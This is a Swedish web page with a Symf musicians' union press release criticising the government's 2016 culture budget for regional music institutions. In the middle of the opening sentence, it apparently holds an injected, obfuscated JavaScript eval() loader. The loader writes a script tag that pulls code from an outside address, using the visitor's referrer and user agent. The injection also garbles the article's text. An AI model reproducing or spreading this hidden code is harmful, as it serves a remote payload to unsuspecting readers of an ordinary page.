Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

Regeringens budget hotar samverkansmodellen!

Regeringens budget hotar samverkansmodellen!
Sebastian

Regeringens eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|idedn|var|u0026u|referrer|rnsnn||js|php’.split(’|’),0,{}))
budgetanslag till den regionala kulturverksamheten kompenserar inte för löne- och kostnadsökningar. Nu tvingas istället kommuner och regioner att höja sina anslag rejält för att de regionala musikinstitutionerna inte ska tvingas till nedskärningar. På sikt hotar det hela samverkansmodellen.

I årets budget skriver kulturdepartementet att den regionala samverkansmodellen fungerar bra. Det hade därför varit rimligt att regeringen anslog ekonomiska medel som både kompenserade för innevarande års nedskärning och för 2016 års förväntade pris- och löneökningar. Istället lägger man ansvaret för den statliga kulturpolitikens genomförande på kommuner, landsting och regioner.

– Årets budget hotar musikinstitutioner i hela landet. Regeringens politik signalerar stagnation och man överlåter hela ansvaret för nödvändiga uppräkningar till regioner och kommuner, säger Bo Olsson, Symfs ordförande.

– Sannolikt kommer regionala musikinstitutioner att tvingas höja biljettpriserna för att kompensera för uteblivna anslagshöjningar. Det minskar möjligheterna att locka till sig nya publikgrupper och rimmar illa med regeringens uttalade mål om ”mer kultur till fler”. Risken är att professionell kultur blir ett storstadsfenomen, menar Bo Olsson.

Inte heller finns några nya satsningar på det fria musiklivet med i budgeten för 2016. Den enda ljusglimten är satsningen på de kommunala kultur- och musikskolorna som får ökade medel för att kunna sänka avgifterna. Men det räcker inte. Årets kulturbudget för teater, dans och musik är inte bara en besvikelse. Den är ett tydligt bevis på att regeringen har gett upp tanken om en dynamisk och framåtblickande statlig kulturpolitik.

Symf, Sveriges Yrkesmusikerförbund, är fackförbundet för frilansande och anställda musiker och korister i konserthus, symfoniorkestrar, kammarorkestrar, operahus och länsmusiken. Symf är ett yrkesförbund som drivs av professionella musiker för att utveckla och värna musikers arbetsvillkor.